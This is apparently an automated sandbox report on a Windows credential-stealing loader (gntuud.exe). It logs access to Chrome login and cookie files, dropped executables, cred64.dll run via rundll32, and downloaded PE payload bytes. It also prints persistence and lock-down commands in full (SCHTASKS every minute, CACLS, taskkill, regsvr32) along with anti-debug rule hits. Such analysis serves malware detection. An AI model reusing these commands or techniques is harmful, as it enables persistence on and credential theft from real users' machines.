
NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b07000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0056c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ca2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description gntuud.exe tried to sleep 331 seconds, actually delayed analysis time by 331 seconds
Application Crash Process chrome.exe with pid 2376 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0x980004
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30

exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 fc 76
exception.instruction: call qword ptr [rip + 0x91f16]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x980004
registers.r14: 258011384
registers.r15: 84809136
registers.rcx: 1308
registers.rsi: 17302540
registers.r10: 0
registers.rbx: 258010640
registers.rsp: 258010360
registers.r11: 258014256
registers.r8: 2004779404
registers.r9: 0
registers.rdx: 1364
registers.r12: 258011000
registers.rbp: 258010496
registers.rdi: 51999680
registers.rax: 9961472
registers.r13: 84361792
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 1\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\f13cd130-bd44-4180-a60f-3cfe14b0b6ef.dmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-6391B3E5-948.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 1\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3
file C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\mode-ecb.js
file C:\Users\test22\AppData\Roaming\85f469ce401df1\cred64.dll
file C:\Users\test22\AppData\Local\Temp\1000004001\newlege.exe
file C:\Users\test22\AppData\Local\Temp\1000061001\linda5.exe
file C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\jquery-3.3.1.min.js
file C:\Users\test22\AppData\Local\Temp\1000003001\anon.exe
file C:\Users\test22\AppData\Local\Temp\1000001001\linda5.exe
file C:\Users\test22\AppData\Local\Temp\1000002001\nash.exe
file C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll
file C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js
file C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\pad-nopadding.js
file C:\Users\test22\AppData\Local\Temp\1000058001\mp3studios_97.exe
file C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\aes.js
file C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\content.js
file C:\Users\test22\AppData\Local\Temp\1000067001\wish.exe
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\9c69749b54" /P "test22:N"&&CACLS "..\9c69749b54" /P "test22:R" /E&&Exit
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
cmdline cmd.exe /c taskkill /f /im chrome.exe
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
cmdline "C:\Windows\System32\regsvr32.exe" YGCR.s /u -S
cmdline regsvr32 YGCR.s /u -S
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
file C:\Users\test22\AppData\Local\Temp\1000001001\linda5.exe
file C:\Users\test22\AppData\Local\Temp\1000002001\nash.exe
file C:\Users\test22\AppData\Local\Temp\1000003001\anon.exe
file C:\Users\test22\AppData\Local\Temp\1000004001\newlege.exe
file C:\Users\test22\AppData\Local\Temp\1000058001\mp3studios_97.exe
file C:\Users\test22\AppData\Local\Temp\1000067001\wish.exe
file C:\Users\test22\AppData\Roaming\85f469ce401df1\cred64.dll
file C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll
file C:\Users\test22\AppData\Local\Temp\1000067001\wish.exe
file C:\Users\test22\AppData\Local\Temp\YGCR.s
file C:\Users\test22\AppData\Local\Temp\1000002001\nash.exe
file C:\Users\test22\AppData\Local\Temp\1000001001\linda5.exe
file C:\Users\test22\AppData\Local\Temp\1000003001\anon.exe
file C:\Users\test22\AppData\Local\Temp\1000058001\mp3studios_97.exe
file C:\Users\test22\AppData\Local\Temp\1000004001\newlege.exe
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\9c69749b54" /P "test22:N"&&CACLS "..\9c69749b54" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000001001\linda5.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000001001\linda5.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000002001\nash.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000002001\nash.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000003001\anon.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000003001\anon.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000004001\newlege.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000004001\newlege.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\85f469ce401df1\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000058001\mp3studios_97.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000058001\mp3studios_97.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000061001\linda5.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000061001\linda5.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000067001\wish.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000067001\wish.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $cìÍ'£U'£U'£U“RU*£U“PUª£U“QU?£U†ú^U%£U†ú§T5£U†ú T0£U†ú¦T £U.õ U-£U.õ0U"£U'¢UЍ£UÕú¦T£UÕú£T&£UÕú\U&£UÕú¡T&£URich'£UPEL·°´aà b €B€@°@Á44< øß€X(ÌûTh¢@€ Ü .textú`b `.rdatat €¢f@@.data8]0@À.didat`@À.rsrcøß à@@.relocX(€*ú@Bh>CèâÃÌÌÌÌÌhpBè“-YÃÌÌÌÌèyZ£ÈÏCÃÌÌÌÌ̹ØÏCéìhÌÌÌÌÌ̹àÔCèÌh pBèY-YÃÌÌÌÌÌÌÌÌÌ̹˜àEè,Gh°pBè9-YÃÌÌÌÌÌÌÌÌÌ̹+Eé ÌÌÌÌÌ̹0+Eè)hÀpBè -YÃÌÌÌÌÌÌÌÌÌ̹¢QFèÜFhÐpBèé,YÃÌÌÌÌÌÌÌÌÌ̹*Eè¼FhàpBèÉ,YÃÌÌÌÌÌÌÌÌÌ̹˜+EèQhðpBè©,YÃÌÌÌÌÌÌÌÌÌÌU‹ìì,EüVPÿdF…Àu`‹E3ɉE܍…Ôýÿÿ‰Eä‹E ‰EèEÜP‰MàÇEìA‰Mð‰MôÿTF‹ð…öt)SÿuVÿXF‹Mü…ÀVQ•Ë‹r‹Îÿ ‚Bÿ֊Ã[ë2À^ÉÂ̶D$ Pÿt$ ÿt$ ÿ4‘FPÿ0‘F ¶D$ ÷ØÀƒà Pÿt$ ÿt$ ÿ4‘FPÿ@‘F U‹ìƒ} 0tY} u]ŠE ¹0+E$¶ÀPÿuÿuè77öE t>ÿuÿ(‘F…Àt1h!0Pÿ4‘F…Àt!öE thD…BPÿ,‘Fë ÿu¹0+EèÌ62À]¸"oBè(QV‹ñ‰uð蘃eüŽ³è‚VŽ|³ÆEüèsVŽÜ³ÆEüèdVŽ<´ÆEüèUVŽœ´ÆEüèFV‹ÎÆEüèÅ‹Mô‹Æ^d‰ ÉÃU‹ìd¡jÿh.oBPd‰%V‹ñƒ>t€~t ‹FÀPÿ6è¢Fÿ6èÎsY‹Môd‰ ^ÉÃÌÌÌÌÌé®ÿÿÿÁ<´é±V¸ èã'SUVWjjÿ´$( èú‹Œ$ ‹ØèJW½颍D$Pèø$‹ð·Qè¿#€¼$ t „Àt3Àf‰ë„ÀtUh@…BD$PèþTjjD$‹ûP蔋ðfƒ>*u:·NQèt#„Àt,j.Xj\f‰„$XUf‰„$„$SPèÛT¼$ÿ´$( WVèÙ„Àu'‹Œ$ D$UPèQV„À…Dÿÿÿ_^][Ä °ëïU‹ìVjÿu‹ñÿuÿu †|³Pèàþÿÿ„Àt°ë,€}t$ƒ¾ô³tjÿu†Ü³ÿuÿu Pè²þÿÿ„ÀtÒ2À^]ÂV‹ñèt3ÀŽ³f‰†ú’f‰†£f‰†ð’‰†ô’ˆ†ø’èÑUŽ|³èÆUŽÜ³è»UŽœ´è°UŽ<´è¥UŽpq^é´QQSUV‹t$(W‹ù…öt ƒ|$0v3Àf‰‹L$3ÛCSjЁñi(ˆD$‹Ïÿt$‰l$ Uèùþÿÿ„Àu4Ç³‹Ï‰|$èWU‹Ïëÿt$$UWè„Àu‹L$Cè±T‹ø…ÿuá3À_^][YY‹l$ …ítÿt$WèS÷ØÀþÀˆE…öt ÿt$0WVè#S‹ÃëÉV‹ñƒ>t ÿ6è!qƒ&Yƒfƒf^ËT$V‹t$W‹|$…öt¶¶Â3ÈÁê3>CGƒîuè_‹Â^ V‹t$3À9Fu(Wj‹È_‹ÑÑêöÁ‹Êtñ ƒ¸íƒïuê‰ †@=rÚ_^ÂU‹ìƒìLÿuM´èu‹Môƒùs ‹E ‰D´ÿEôM´è]ÉÂU‹ìƒìLÿuM´èF‹Môƒùs‹E ‰D´‹MôA‰Môƒùs ‹E‰D´ÿEôM´èÛ\É 3ÀÇA‰‰Af‰A ‹ÁÃVW‹ñ¸D…BjY‹þó«j 3ÿF WPè(4‹D$ƒÄ ‰~@‰~D‰FH‹Æ_^ÂVÿt$‹ñjè7ÿÿÿj‹Îèî^Âj èã‹D$ÆÂV‹ñ€~ uèÿt$ ÿt$ è†_„ÀuÆF ë2À^ÂV‹ñ€~ uÿt$j èÚþÿÿ‹ÎèÛj‹ÎèŠ^ÂVÿt$ ‹ñÿt$ j èãþÿÿ‹Îèµj ‹Îèd^ÂéU‹ììEPjÿu …øÿÿhP薃č…øÿÿPjègþÿÿ‹MègÉÃÿ€B…Àt$jÿt$ ÿt$ hPjhÿ€B…À•Àë2ÀÂV‹ñè j‹Îè^ÃU‹ìƒìLV‹ñM´jèŠþÿÿM´èD[j‹Îè³^ÉÃV‹ñèèXÿt$ ÿt$ jèþÿÿ‹ÎèÚj‹Îè‰^Âÿt$jèÊÿÿÿÂVÿt$‹ñjè j ‹Îè$^ÂVÿt$ ‹ñÿt$ j è¹ýÿÿ‹Îè‹j ‹Îè:^Âÿt$jèÏÿÿÿÂV‹ñ€~ uÿt$j èTýÿÿ‹ÎèUj‹ÎèÈ^‹T$‹Âƒètƒèt&ƒèt-üuƒ9u‰ÿAƒ9 
tõÇëíƒ9tƒ9uãÇëہì$hPè‡þÿÿ„Àt]SUWj [j ]|$ V·f;Ãtf;ÅuƒÇëîf…Àt4SWè6‹ðYY…öuUWè6‹ðYY…öt3Àf‰ƒÆWjèüÿÿ‹þ…öuµ^_][ÄÃU‹ìQV‹uþÿu €yu^ÉÂVèÿÿÿhèCEü‰uüPèí6Ìÿt$ÿt$j!èiüÿÿj¹+EèîþÿÿÂVÿt$ ‹ñÿt$ è j‹Îè–ÿÿÿ^ÂVÿt$ ‹ñÿt$ j è+üÿÿ‹Îèýþÿÿj‹Îè¬þÿÿ^¸˜^CÃU‹ìÿuÿuÿuÿu ÿuèãÿÿÿÿpÿ0è)ƒÄ…ÀyƒÈÿ]ÃIÿ3Àf‰A2ˆA ‰AˆA‰4ˆA0f‰A$‰A‰A(‰A,‹ÁÇH…BfÇAÆAÇA Ã3À‰‰‰‰‰ ‰$‹ÁÃU‹ìd¡jÿh.oBPd‰%ƒyÿÇH…Bt€yu€ytè~ëèI‹Môd‰ ÉÃÌÌÌÌÌÌÌÌÌÌÌÌÌV‹ñè£ÿÿÿöD$t h8Vè YY‹Æ^ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌSV‹ñ³ƒ~ÿt"€~uƒ~uÿvÿ,€BXÿ÷ÛÛþÃNÿƒf„Ûu8^tF2¹+EPèûÿÿ^ŠÃ[øèXS‹œ$ UVW‹û‹ñÑïöÃu €~0u3íë3íE‹„$ƒ÷ÁçP‰^ Ç@èd·ƒø.tƒ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¿ªùà 0¤‚µ à@  @…0µOà$ µ  H.textØ  ¤ `.rsrc$à¨@@.reloc ¸@BdµHô» ùE0 us# ~ç%-&~æþ¾s$ %€ç(+o& 8o' f%rprYp~( () ¢%rqpr¯p~( () ¢%rÇprp~( () ¢%r!prap~( () ¢(  o* 8u(+ sµså~( }å~( s, (- o. }å{årqprÑp~( () o/   ,rãprp~( () +;rprap~( () o/ -{å(+ {å( (0 þ  9~o1   (2 o3 o4 (5 {å(   (0 þ  95þ¶s6 ~è%-&~æþ¿s7 %€è(+þ·s6 ~é%-&~æþÀs7 %€é(+þ¸s6 ~ê%-&~æþÁs7 %€ê(+oÙ oÛþ¹s8 ~ë%-&~æþÂs9 %€ë(+oÝoãþºs: ~ì%-&~æþÃs; %€ì(+oßþ»s< ~í%-&~æþÄs= %€í(+oá(+,[så%oÙ% rip(5 oÛ%s? oÝ%oã%s@ oß%sA oáoB (+,[så%oÙ% r{p(5 oÛ%s? oÝ%oã%s@ oß%sA oáoB ÞÞoäþ, oB (C :üÿÿÞþo Üo :áûÿÿÞ ,o ÜÞ&Þ+*Adå( µˆ=4&Z ah0’s?  h%ÐÏ(D sE (F (G þ , ÝS( s¦h%У(D sE o©&8òso«oH oo«oH oo«(oÞÞÞooÿ(I - oÿ+r‘poo(I - o+r‘poo(I - o+r‘poÜor‘p(J   , oK Xo¥þ  :úþÿÿÞ ÞÞ Þ+*AdzJÄzRÌoC8{}„0ÇsL (F (G þ , ݞ( s¦h%ÐÂ(D sE o©&8>sæ%o«oH oé%o«oH o1 .þoë%o«oH oí%o«o1 1þoï%o«oH (M @Bj[!‘¶Yoñ%o«oH oó%o«(oõoðjþ,-(N    (O   (P !€µ÷õŸYoñÞ&Þ-+(ô(I þ  , oQ Xo¥þ  :®þÿÿÞ&ÞÞ Þ+*AL` i-„±²¹0s@ h%ÐÆ(D sE (F (G þ , ÝA( s¦h%З(D sE o©&8àh%Ь(D sE o§oH h%Ч(D sE oR -h%ÐÒ(D sE oR +  , (s×  h%ÐÖ(D sE o§oH oÔ oÖ Þ&Þþ  , oS Xo¥þ  : ÿÿÿÞ ÞÞÞ+*ALu¼1B&hjq0=sA h%ÐÆ(D sE (F (G þ ,Ý( s¦r¡pr p~( () o©&8¡sþ%o«oH o÷%o«oH (T où%o«oH (T oû
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL ÐÔà 0¤²µ à@  @…`µOà, Dµ  H.text¡ ¤ `.rsrc,à¨@@.reloc ¸@B”µHô»PùE0 us# ~ç%-&~æþ¾s$ %€ç(+o& 8o' f%rprYp~( () ¢%rqpr¯p~( () ¢%rÇprp~( () ¢%r!prap~( () ¢(  o* 8u(+ sµså~( }å~( s, (- o. }å{årqprÑp~( () o/   ,rãprp~( () +;rprap~( () o/ -{å(+ {å( (0 þ  9~o1   (2 o3 o4 (5 {å(   (0 þ  95þ¶s6 ~è%-&~æþ¿s7 %€è(+þ·s6 ~é%-&~æþÀs7 %€é(+þ¸s6 ~ê%-&~æþÁs7 %€ê(+oÙ oÛþ¹s8 ~ë%-&~æþÂs9 %€ë(+oÝoãþºs: ~ì%-&~æþÃs; %€ì(+oßþ»s< ~í%-&~æþÄs= %€í(+oá(+,[så%oÙ% rip(5 oÛ%s? oÝ%oã%s@ oß%sA oáoB (+,[så%oÙ% r{p(5 oÛ%s? oÝ%oã%s@ oß%sA oáoB ÞÞoäþ, oB (C :üÿÿÞþo Üo :áûÿÿÞ ,o ÜÞ&Þ+*Adå( µˆ=4&Z ah0’s?  h%ÐÏ(D sE (F (G þ , ÝS( s¦h%У(D sE o©&8òso«oH oo«oH oo«(oÞÞÞooÿ(I - oÿ+r‘poo(I - o+r‘poo(I - o+r‘poÜor‘p(J   , oK Xo¥þ  :úþÿÿÞ ÞÞ Þ+*AdzJÄzRÌoC8{}„0ÇsL (F (G þ , ݞ( s¦h%ÐÂ(D sE o©&8>sæ%o«oH oé%o«oH o1 .þoë%o«oH oí%o«o1 1þoï%o«oH (M @Bj[!‘¶Yoñ%o«oH oó%o«(oõoðjþ,-(N    (O   (P !€µ÷õŸYoñÞ&Þ-+(ô(I þ  , oQ Xo¥þ  :®þÿÿÞ&ÞÞ Þ+*AL` i-„±²¹0s@ h%ÐÆ(D sE (F (G þ , ÝA( s¦h%З(D sE o©&8àh%Ь(D sE o§oH h%Ч(D sE oR -h%ÐÒ(D sE oR +  , (s×  h%ÐÖ(D sE o§oH oÔ oÖ Þ&Þþ  , oS Xo¥þ  : ÿÿÿÞ ÞÞÞ+*ALu¼1B&hjq0=sA h%ÐÆ(D sE (F (G þ ,Ý( s¦r¡pr p~( () o©&8¡sþ%o«oH o÷%o«oH (T où%o«oH (T oû
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer:
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer:
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer:
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer:
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer:
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer:
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeCreateTokenPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeAssignPrimaryTokenPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeMachineAccountPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeLoadDriverPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeRestorePrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeRemoteShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeEnableDelegationPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeManageVolumePrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeCreateGlobalPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTrustedCredManAccessPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: 7-Zip
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExW

regkey_r: AddressBook
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: Adobe AIR
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR
1 0 0

RegOpenKeyExW

regkey_r: Connection Manager
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: DirectDrawEx
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: EditPlus
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: Fontcore
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: Google Chrome
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: Haansoft HWord 80 Korean
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: IE40
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: IE4Data
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

regkey_r: IE5BAKEX
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

regkey_r: IEData
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

regkey_r: MobileOptionPack
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko)
